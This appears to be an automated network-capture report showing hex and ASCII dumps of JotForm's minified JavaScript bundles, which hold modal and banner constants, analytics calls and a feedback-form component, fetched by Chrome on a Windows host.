                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 52 4f 4d 4f 54 49 4f 4e 53 2c 61 73 73 65 74 3a 65 2c 74 61 72 67 65 74 3a 6f 2c 61 63 74 69 6f 6e 3a 74 7d 3b 45 26 26 28 72 2e 69 6e 74 65 6e 74 3d 45 29 3b 63 6f 6e 73 74 20 5f 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 72 29 3b 72 65 74 75 72 6e 20 69 2e 70 6f 73 74 28 22 65 70 2f 75 73 65 72 2f 61 63 74 69 6f 6e 73 22 2c 5f 29 7d 7d 7d 2c 32 32 30 36 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6f 2c 74 29 7b 74 2e 64 28 6f 2c 7b 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 7d 7d 29 3b 63 6f 6e 73 74 20 45 3d 7b 41 42 5f 54 45 53 54 3a 7b 41 44 44 5f 43 4f 4c 4c 41 42 4f 52 41 54 4f 52 5f 4d 4f 44 41 4c 3a 22 61 64 64 43 6f 6c 6c 61 62 6f 72 61 74 6f 72 4d 6f 64 61 6c 22 2c 41 44 44 5f 43 4f 4c 4c 41 42 4f 52 41 54 4f
                                                                                                                                                                                                                                            Data Ascii: ROMOTIONS,asset:e,target:o,action:t};E&&(r.intent=E);const _=new URLSearchParams(r);return i.post("ep/user/actions",_)}}},22062:function(e,o,t){t.d(o,{s:function(){return E}});const E={AB_TEST:{ADD_COLLABORATOR_MODAL:"addCollaboratorModal",ADD_COLLABORATO
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 44 45 52 5f 4d 4f 44 41 4c 3a 22 66 65 61 74 75 72 65 53 6c 69 64 65 72 4d 6f 64 61 6c 22 2c 4c 4f 43 41 4c 5f 44 41 54 41 5f 52 45 53 49 44 45 4e 43 59 5f 4d 4f 44 41 4c 3a 22 6c 6f 63 61 6c 44 61 74 61 52 65 73 69 64 65 6e 63 79 4d 6f 64 61 6c 22 2c 50 52 49 43 49 4e 47 5f 54 41 42 4c 45 5f 4d 4f 44 41 4c 3a 22 70 72 69 63 69 6e 67 54 61 62 6c 65 4d 6f 64 61 6c 22 2c 50 52 49 43 49 4e 47 5f 54 41 42 4c 45 5f 49 53 4f 4c 41 54 45 44 5f 4d 4f 44 41 4c 3a 22 70 72 69 63 69 6e 67 54 61 62 6c 65 49 73 6f 6c 61 74 65 64 4d 6f 64 61 6c 22 2c 53 48 41 52 45 5f 46 4f 4c 44 45 52 5f 4d 4f 44 41 4c 3a 22 73 68 61 72 65 46 6f 6c 64 65 72 4d 6f 64 61 6c 22 2c 53 4f 43 32 5f 43 4f 4d 50 4c 49 41 4e 43 45 5f 4d 4f 44 41 4c 3a 22 73 6f 63 32 43 6f 6d 70 6c 69 61 6e 63
                                                                                                                                                                                                                                            Data Ascii: DER_MODAL:"featureSliderModal",LOCAL_DATA_RESIDENCY_MODAL:"localDataResidencyModal",PRICING_TABLE_MODAL:"pricingTableModal",PRICING_TABLE_ISOLATED_MODAL:"pricingTableIsolatedModal",SHARE_FOLDER_MODAL:"shareFolderModal",SOC2_COMPLIANCE_MODAL:"soc2Complianc
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 4c 4f 47 5f 45 44 55 43 41 54 49 4f 4e 5f 43 4f 4e 54 45 4e 54 5f 42 41 4e 4e 45 52 3a 22 62 6c 6f 67 45 64 75 63 61 74 69 6f 6e 43 6f 6e 74 65 6e 74 42 61 6e 6e 65 72 22 2c 42 4c 4f 47 5f 43 4f 4e 54 45 4e 54 5f 53 49 44 45 5f 42 41 4e 4e 45 52 3a 22 62 6c 6f 67 43 6f 6e 74 65 6e 74 53 69 64 65 42 61 6e 6e 65 72 22 2c 43 55 53 54 4f 4d 5f 44 4f 4d 41 49 4e 5f 54 4f 4f 4c 54 49 50 5f 42 41 4e 4e 45 52 3a 22 63 75 73 74 6f 6d 44 6f 6d 61 69 6e 54 6f 6f 6c 74 69 70 22 2c 45 44 55 43 41 54 49 4f 4e 5f 42 44 4d 5f 46 4c 4f 57 5f 42 41 4e 4e 45 52 3a 22 65 64 75 63 61 74 69 6f 6e 42 64 6d 46 6c 6f 77 42 61 6e 6e 65 72 22 2c 45 4e 54 45 52 50 52 49 53 45 5f 42 49 4c 4c 49 4e 47 5f 42 41 4e 4e 45 52 3a 22 65 6e 74 65 72 70 72 69 73 65 42 69 6c 6c 69 6e 67 42 61
                                                                                                                                                                                                                                            Data Ascii: LOG_EDUCATION_CONTENT_BANNER:"blogEducationContentBanner",BLOG_CONTENT_SIDE_BANNER:"blogContentSideBanner",CUSTOM_DOMAIN_TOOLTIP_BANNER:"customDomainTooltip",EDUCATION_BDM_FLOW_BANNER:"educationBdmFlowBanner",ENTERPRISE_BILLING_BANNER:"enterpriseBillingBa
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 2c 53 53 4f 5f 50 52 45 46 49 4c 4c 5f 42 41 4e 4e 45 52 3a 22 73 73 6f 50 72 65 66 69 6c 6c 42 61 6e 6e 65 72 22 2c 53 59 53 54 45 4d 5f 4c 4f 47 53 5f 42 41 4e 4e 45 52 3a 22 73 79 73 74 65 6d 4c 6f 67 73 42 61 6e 6e 65 72 22 2c 53 59 53 54 45 4d 5f 4c 4f 47 53 5f 54 49 4e 59 5f 42 41 4e 4e 45 52 3a 22 73 79 73 74 65 6d 4c 6f 67 73 54 69 6e 79 42 61 6e 6e 65 72 22 2c 44 45 44 49 43 41 54 45 44 5f 53 55 50 50 4f 52 54 5f 42 41 4e 4e 45 52 5f 56 32 3a 22 64 65 64 69 63 61 74 65 64 53 75 70 70 6f 72 74 42 61 6e 6e 65 72 56 32 22 2c 53 4f 43 32 5f 43 4f 4d 50 4c 49 41 4e 43 45 5f 42 41 4e 4e 45 52 3a 22 73 6f 63 32 43 6f 6d 70 6c 69 61 6e 63 65 42 61 6e 6e 65 72 22 2c 4d 55 4c 54 49 5f 55 53 45 52 5f 42 41 4e 4e 45 52 3a 22 6d 75 6c 74 69 55 73 65 72 42 61
                                                                                                                                                                                                                                            Data Ascii: ,SSO_PREFILL_BANNER:"ssoPrefillBanner",SYSTEM_LOGS_BANNER:"systemLogsBanner",SYSTEM_LOGS_TINY_BANNER:"systemLogsTinyBanner",DEDICATED_SUPPORT_BANNER_V2:"dedicatedSupportBannerV2",SOC2_COMPLIANCE_BANNER:"soc2ComplianceBanner",MULTI_USER_BANNER:"multiUserBa
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 4c 4f 47 5f 4d 41 50 50 49 4e 47 5f 57 45 42 49 4e 41 52 5f 42 41 4e 4e 45 52 3a 22 62 6c 6f 67 4d 61 70 70 69 6e 67 57 65 62 69 6e 61 72 42 61 6e 6e 65 72 22 2c 42 4c 4f 47 5f 4d 41 50 50 49 4e 47 5f 57 45 42 49 4e 41 52 5f 53 45 43 54 49 4f 4e 3a 22 62 6c 6f 67 4d 61 70 70 69 6e 67 57 65 62 69 6e 61 72 53 65 63 74 69 6f 6e 22 2c 42 4c 4f 47 5f 4d 41 50 50 49 4e 47 5f 52 45 43 4f 4d 4d 45 4e 44 41 54 49 4f 4e 5f 42 41 4e 4e 45 52 3a 22 62 6c 6f 67 4d 61 70 70 69 6e 67 52 65 63 6f 6d 6d 65 6e 64 61 74 69 6f 6e 42 61 6e 6e 65 72 22 2c 42 4c 4f 47 5f 4d 41 50 50 49 4e 47 5f 41 52 54 49 43 4c 45 5f 42 41 4e 4e 45 52 3a 22 62 6c 6f 67 4d 61 70 70 69 6e 67 41 72 74 69 63 6c 65 42 61 6e 6e 65 72 22 2c 42 4c 4f 47 5f 4d 41 50 50 49 4e 47 5f 46 4f 4f 54 45 52 5f
                                                                                                                                                                                                                                            Data Ascii: LOG_MAPPING_WEBINAR_BANNER:"blogMappingWebinarBanner",BLOG_MAPPING_WEBINAR_SECTION:"blogMappingWebinarSection",BLOG_MAPPING_RECOMMENDATION_BANNER:"blogMappingRecommendationBanner",BLOG_MAPPING_ARTICLE_BANNER:"blogMappingArticleBanner",BLOG_MAPPING_FOOTER_
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 54 6f 6f 6c 74 69 70 4c 65 67 61 63 79 22 2c 54 45 41 4d 53 5f 43 55 53 54 4f 4d 5f 44 4f 4d 41 49 4e 5f 4c 45 47 41 43 59 5f 54 4f 4f 4c 54 49 50 3a 22 74 65 61 6d 73 43 75 73 74 6f 6d 44 6f 6d 61 69 6e 4c 65 67 61 63 79 54 6f 6f 6c 74 69 70 22 2c 44 45 44 49 43 41 54 45 44 5f 53 55 50 50 4f 52 54 5f 42 41 4e 4e 45 52 3a 22 64 65 64 69 63 61 74 65 64 53 75 70 70 6f 72 74 42 61 6e 6e 65 72 22 2c 47 45 4e 45 52 41 4c 5f 46 41 51 5f 50 52 4f 46 5f 53 45 52 56 49 43 45 53 5f 42 41 4e 4e 45 52 3a 22 67 65 6e 65 72 61 6c 46 61 71 50 72 6f 66 65 73 73 69 6f 6e 61 6c 53 65 72 76 69 63 65 73 42 61 6e 6e 65 72 22 2c 4c 49 4d 49 54 5f 42 41 4e 4e 45 52 3a 22 6c 69 6d 69 74 42 61 6e 6e 65 72 22 2c 4c 4f 43 41 4c 5f 44 41 54 41 5f 52 45 53 49 44 45 4e 43 59 5f 42 41
                                                                                                                                                                                                                                            Data Ascii: TooltipLegacy",TEAMS_CUSTOM_DOMAIN_LEGACY_TOOLTIP:"teamsCustomDomainLegacyTooltip",DEDICATED_SUPPORT_BANNER:"dedicatedSupportBanner",GENERAL_FAQ_PROF_SERVICES_BANNER:"generalFaqProfessionalServicesBanner",LIMIT_BANNER:"limitBanner",LOCAL_DATA_RESIDENCY_BA
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 64 61 6c 22 2c 48 45 41 4c 54 48 43 41 52 45 5f 4d 4f 44 41 4c 3a 22 73 65 67 6d 65 6e 74 65 64 48 65 61 6c 74 68 63 61 72 65 4d 6f 64 61 6c 22 2c 4e 4f 4e 50 52 4f 46 49 54 5f 4d 4f 44 41 4c 3a 22 73 65 67 6d 65 6e 74 65 64 4e 6f 6e 70 72 6f 66 69 74 4d 6f 64 61 6c 22 2c 52 45 54 49 52 45 44 5f 41 55 5f 44 41 54 41 5f 52 45 53 49 44 45 4e 43 59 5f 4d 4f 44 41 4c 3a 22 61 75 73 74 72 61 6c 69 61 6e 44 61 74 61 52 65 73 69 64 65 6e 63 79 4d 6f 64 61 6c 22 2c 41 55 5f 44 41 54 41 5f 52 45 53 49 44 45 4e 43 59 5f 4d 4f 44 41 4c 3a 22 61 75 73 74 72 61 6c 69 61 44 61 74 61 52 65 73 69 64 65 6e 63 79 4d 6f 64 61 6c 22 2c 48 4b 5f 44 41 54 41 5f 52 45 53 49 44 45 4e 43 59 5f 4d 4f 44 41 4c 3a 22 68 6f 6e 67 4b 6f 6e 67 44 61 74 61 52 65 73 69 64 65 6e 63 79 4d
                                                                                                                                                                                                                                            Data Ascii: dal",HEALTHCARE_MODAL:"segmentedHealthcareModal",NONPROFIT_MODAL:"segmentedNonprofitModal",RETIRED_AU_DATA_RESIDENCY_MODAL:"australianDataResidencyModal",AU_DATA_RESIDENCY_MODAL:"australiaDataResidencyModal",HK_DATA_RESIDENCY_MODAL:"hongKongDataResidencyM
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 6f 2c 74 29 7b 74 2e 64 28 6f 2c 7b 51 43 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 2c 67 34 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 69 62 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 7d 2c 6b 62 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 2c 6e 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 2c 74 39 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 54 7d 7d 29 3b 76 61 72 20 45 3d 74 28 38 39 35 34 34 29 3b 63 6f 6e 73 74 20 72 3d 22 65 6e 74 65 72 70 72 69 73 65 2d 70 72 6f 6d 6f 74 69 6f 6e 73 2d 72 6f 6f 74 22 2c 5f 3d 7b 54 45 41 4d 53 3a 22 74 65 61 6d 73 22 2c 41 55 5f 44 41 54 41 5f 52 45 53 49 44 45 4e 43 59 5f 4d 4f 44 41 4c 3a 22 61 75 44
                                                                                                                                                                                                                                            Data Ascii: o,t){t.d(o,{QC:function(){return i},g4:function(){return n},ib:function(){return _},kb:function(){return a},nn:function(){return r},t9:function(){return T}});var E=t(89544);const r="enterprise-promotions-root",_={TEAMS:"teams",AU_DATA_RESIDENCY_MODAL:"auD
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 22 32 33 33 33 31 33 34 31 33 33 33 35 39 35 30 22 2c 44 45 56 3a 22 32 34 30 30 33 32 37 37 34 37 36 33 39 36 31 22 7d 2c 5b 72 5d 3a 7b 4c 49 56 45 3a 22 32 34 30 30 32 33 34 30 39 35 31 39 39 35 35 22 2c 44 45 56 3a 22 32 34 30 30 33 32 35 35 36 38 35 38 39 36 34 22 7d 7d 7d 2c 38 39 35 34 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6f 2c 74 29 7b 74 2e 64 28 6f 2c 7b 50 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 7d 7d 29 3b 63 6f 6e 73 74 20 45 3d 7b 44 41 53 48 42 4f 41 52 44 3a 22 44 41 53 48 42 4f 41 52 44 22 2c 41 44 44 5f 41 4e 44 5f 4d 41 4e 41 47 45 5f 55 53 45 52 53 3a 22 41 44 44 20 26 20 4d 41 4e 41 47 45 20 55 53 45 52 53 22 2c 41 44 4d 49 4e 5f 43 4f 4e 53 4f 4c 45 5f 43 41 50 49 54 41 4c 49 5a 45 44 3a 22 41 44 4d 49 4e 20 43
                                                                                                                                                                                                                                            Data Ascii: "233313413335950",DEV:"240032774763961"},[r]:{LIVE:"240023409519955",DEV:"240032556858964"}}},89544:function(e,o,t){t.d(o,{P:function(){return E}});const E={DASHBOARD:"DASHBOARD",ADD_AND_MANAGE_USERS:"ADD & MANAGE USERS",ADMIN_CONSOLE_CAPITALIZED:"ADMIN C


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            55192.168.2.1749765104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC560OUTGET /s/portal/674ac14411e/static/js/3186.c12c9a19.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn03.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC428INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:15 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 47148
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:21:17 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "c45ac812e8a964e34c70f49737398bc7"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 277
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb62d681232d3-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC941INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 65 2e 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 62 63 66 66 66 65 62 62 2d 32 64 35 33 2d 35 36 64 34 2d 61 37 66 31 2d 36 65 64 35 64 33
                                                                                                                                                                                                                                            Data Ascii: "use strict";!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="bcfffebb-2d53-56d4-a7f1-6ed5d3
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 2f 34 37 37 33 33 32 39 2e 6a 73 22 2c 61 2e 61 73 79 6e 63 3d 21 30 2c 61 2e 64 65 66 65 72 3d 21 30 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 2c 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 6e 29 2c 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 65 72 72 6f 72 22 2c 6e 29 2c 28 29 3d 3e 7b 61 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 6e 29 2c 61 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 65 72 72 6f 72 22 2c 6e 29 2c 61 2e 72 65 6d 6f 76 65 28 29 7d 7d 29 2c 5b 74 5d 29 2c 5b 5f 5d 7d 2c 4e 3d 5f 28 22 32 32 32 33 36 22 29 2c 54 3d 5f 28 22 33 37 39 35 33 22 29 2c 4c 3d 5f 28 22 32 33 30 39 37 22 29
                                                                                                                                                                                                                                            Data Ascii: /4773329.js",a.async=!0,a.defer=!0,document.body.appendChild(a),a.addEventListener("load",n),a.addEventListener("error",n),()=>{a.removeEventListener("load",n),a.removeEventListener("error",n),a.remove()}}),[t]),[_]},N=_("22236"),T=_("37953"),L=_("23097")
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 22 30 22 3a 22 31 22 7d 7d 29 2c 28 30 2c 6f 2e 6a 73 78 29 28 22 62 75 74 74 6f 6e 22 2c 7b 69 64 3a 22 66 65 65 64 62 61 63 6b 2d 66 6f 72 6d 2d 63 6c 6f 73 65 22 2c 74 79 70 65 3a 22 62 75 74 74 6f 6e 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 66 65 65 64 62 61 63 6b 2d 66 6f 72 6d 2d 63 6c 6f 73 65 22 2c 6f 6e 43 6c 69 63 6b 3a 28 29 3d 3e 72 28 21 31 29 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6f 2e 6a 73 78 29 28 54 2e 5a 2c 7b 7d 29 7d 29 2c 28 30 2c 6f 2e 6a 73 78 29 28 22 69 66 72 61 6d 65 22 2c 7b 69 64 3a 22 66 65 65 64 62 61 63 6b 2d 66 6f 72 6d 22 2c 74 69 74 6c 65 3a 22 46 65 65 64 62 61 63 6b 20 46 6f 72 6d 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 66 65 65 64 62 61 63 6b 2d 66 6f 72 6d 22 2c 73 72 63 3a 6e 2c 6f 6e 4c 6f 61 64 3a 28 29 3d 3e 73 28
                                                                                                                                                                                                                                            Data Ascii: "0":"1"}}),(0,o.jsx)("button",{id:"feedback-form-close",type:"button",className:"feedback-form-close",onClick:()=>r(!1),children:(0,o.jsx)(T.Z,{})}),(0,o.jsx)("iframe",{id:"feedback-form",title:"Feedback Form",className:"feedback-form",src:n,onLoad:()=>s(
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 4e 2e 43 4f 4d 4d 4f 4e 2e 41 44 5f 46 4f 52 4d 5f 44 45 56 3a 73 3a 70 2e 74 39 26 26 43 3f 45 2e 4e 2e 43 4f 4d 4d 4f 4e 2e 41 44 5f 46 4f 52 4d 5f 4c 49 56 45 3a 63 2c 59 3d 4d 3f 60 24 7b 4d 7d 24 7b 48 7d 60 3a 60 24 7b 28 30 2c 6c 2e 4d 6c 29 28 29 7d 2f 24 7b 78 7d 24 7b 48 7d 60 2c 57 3d 77 69 6e 64 6f 77 2e 5f 68 73 71 7c 7c 5b 5d 2c 5b 56 5d 3d 52 28 7b 69 73 45 6e 61 62 6c 65 64 3a 21 30 2c 75 73 65 72 3a 74 7d 29 2c 5b 71 2c 5a 5d 3d 28 30 2c 69 2e 75 73 65 53 74 61 74 65 29 28 22 22 29 3b 28 30 2c 69 2e 75 73 65 45 66 66 65 63 74 29 28 28 28 29 3d 3e 7b 56 26 26 21 68 2e 63 75 72 72 65 6e 74 26 26 28 57 2e 70 75 73 68 28 5b 22 69 64 65 6e 74 69 66 79 22 2c 7b 65 6d 61 69 6c 3a 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 65 6d 61 69 6c
                                                                                                                                                                                                                                            Data Ascii: N.COMMON.AD_FORM_DEV:s:p.t9&&C?E.N.COMMON.AD_FORM_LIVE:c,Y=M?`${M}${H}`:`${(0,l.Ml)()}/${x}${H}`,W=window._hsq||[],[V]=R({isEnabled:!0,user:t}),[q,Z]=(0,i.useState)("");(0,i.useEffect)((()=>{V&&!h.current&&(W.push(["identify",{email:null==t?void 0:t.email
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 64 3a 28 7b 74 61 72 67 65 74 3a 65 7d 29 3d 3e 7b 74 72 79 7b 63 6f 6e 73 74 20 74 3d 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2c 5f 3d 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 64 6f 63 75 6d 65 6e 74 2c 72 3d 6e 75 6c 6c 3d 3d 5f 3f 76 6f 69 64 20 30 3a 5f 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 6a 6f 74 66 6f 72 6d 2d 66 6f 72 6d 22 29 3b 77 2e 63 75 72 72 65 6e 74 3d 72 2c 6e 75 6c 6c 3d 3d 72 7c 7c 72 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 69 6e 70 75 74 22 2c 28 28 29 3d 3e 7b 76 61 72 20 65 3b 62 2e 63 75 72 72 65 6e 74 7c 7c 28 6e 75 6c 6c 3d 3d 3d 28 65 3d 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 7c 7c 65 2e 70 75
                                                                                                                                                                                                                                            Data Ascii: d:({target:e})=>{try{const t=null==e?void 0:e.contentWindow,_=null==t?void 0:t.document,r=null==_?void 0:_.querySelector(".jotform-form");w.current=r,null==r||r.addEventListener("input",(()=>{var e;b.current||(null===(e=window.dataLayer)||void 0===e||e.pu
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 74 68 3a 22 22 2c 69 73 50 72 65 66 69 6c 6c 45 6e 61 62 6c 65 64 3a 21 30 2c 69 73 41 64 46 6f 72 6d 3a 21 31 2c 69 73 44 79 6e 61 6d 69 63 48 65 69 67 68 74 45 6e 61 62 6c 65 64 3a 21 31 7d 3b 76 61 72 20 4d 3d 44 7d 2c 32 36 36 38 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 5f 29 7b 5f 2e 64 28 74 2c 7b 47 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6a 7d 7d 29 3b 76 61 72 20 72 3d 5f 28 32 32 30 36 32 29 3b 63 6f 6e 73 74 7b 46 4f 4c 44 45 52 5f 4c 49 4d 49 54 5f 4d 4f 44 41 4c 3a 6e 2c 48 45 4c 50 5f 44 45 44 49 43 41 54 45 44 5f 53 55 50 50 4f 52 54 5f 4d 4f 44 41 4c 3a 61 2c 57 48 49 54 45 5f 4c 41 42 45 4c 49 4e 47 5f 4d 4f 44 41 4c 3a 6f 2c 41 53 53 49 47 4e 5f 54 4f 5f 4f 52 47 41 4e 49 5a 41 54 4f 4e 5f 4d 4f 44 41 4c 3a 69 2c 54
                                                                                                                                                                                                                                            Data Ascii: th:"",isPrefillEnabled:!0,isAdForm:!1,isDynamicHeightEnabled:!1};var M=D},26685:function(e,t,_){_.d(t,{G:function(){return j}});var r=_(22062);const{FOLDER_LIMIT_MODAL:n,HELP_DEDICATED_SUPPORT_MODAL:a,WHITE_LABELING_MODAL:o,ASSIGN_TO_ORGANIZATON_MODAL:i,T
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 7d 2c 7b 73 65 6c 65 63 74 6f 72 3a 22 23 74 65 78 74 5f 32 32 35 20 61 22 2c 70 61 79 6c 6f 61 64 3a 7b 65 76 65 6e 74 3a 22 6c 65 61 72 6e 2d 6d 6f 72 65 2d 63 6c 69 63 6b 22 7d 7d 5d 2c 5b 69 5d 3a 5b 7b 73 65 6c 65 63 74 6f 72 3a 22 23 69 6e 70 75 74 5f 31 31 33 22 2c 70 61 79 6c 6f 61 64 3a 7b 65 76 65 6e 74 3a 22 63 6f 6e 74 61 63 74 2d 73 61 6c 65 73 2d 63 6c 69 63 6b 22 7d 7d 2c 7b 73 65 6c 65 63 74 6f 72 3a 22 23 74 65 78 74 5f 31 31 34 20 61 22 2c 70 61 79 6c 6f 61 64 3a 7b 65 76 65 6e 74 3a 22 6c 65 61 72 6e 2d 6d 6f 72 65 2d 63 6c 69 63 6b 22 7d 7d 5d 2c 5b 63 5d 3a 5b 7b 73 65 6c 65 63 74 6f 72 3a 22 23 69 6e 70 75 74 5f 31 31 35 22 2c 70 61 79 6c 6f 61 64 3a 7b 65 76 65 6e 74 3a 22 63 6f 6e 74 61 63 74 2d 73 61 6c 65 73 2d 63 6c 69 63 6b 22
                                                                                                                                                                                                                                            Data Ascii: },{selector:"#text_225 a",payload:{event:"learn-more-click"}}],[i]:[{selector:"#input_113",payload:{event:"contact-sales-click"}},{selector:"#text_114 a",payload:{event:"learn-more-click"}}],[c]:[{selector:"#input_115",payload:{event:"contact-sales-click"
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 5f 4d 4f 44 41 4c 3a 64 2c 45 4e 54 45 52 50 52 49 53 45 5f 42 45 47 49 4e 4e 45 52 53 5f 42 4f 4f 4b 5f 4d 4f 44 41 4c 3a 41 2c 50 44 46 5f 44 4f 57 4e 4c 4f 41 44 5f 4d 4f 44 41 4c 3a 4f 2c 45 4e 54 45 52 50 52 49 53 45 5f 43 41 53 45 5f 53 54 55 44 59 5f 4d 4f 44 41 4c 3a 52 2c 42 4c 4f 47 5f 56 49 44 45 4f 5f 47 41 54 45 44 5f 43 4f 4e 54 45 4e 54 5f 4d 4f 44 41 4c 3a 4e 2c 45 4e 54 45 52 50 52 49 53 45 5f 52 45 47 49 53 54 45 52 5f 55 50 43 4f 4d 49 4e 47 5f 43 4f 55 52 53 45 5f 4d 4f 44 41 4c 3a 54 7d 3d 72 2e 73 2e 50 52 4f 44 55 43 54 2c 7b 45 44 5f 54 45 43 48 5f 57 45 42 49 4e 41 52 5f 4d 4f 44 41 4c 3a 4c 2c 48 45 41 4c 54 48 43 41 52 45 5f 41 55 54 4f 4d 41 54 49 4f 4e 5f 53 54 52 41 54 45 47 49 45 53 5f 57 45 42 49 4e 41 52 5f 4d 4f 44 41 4c
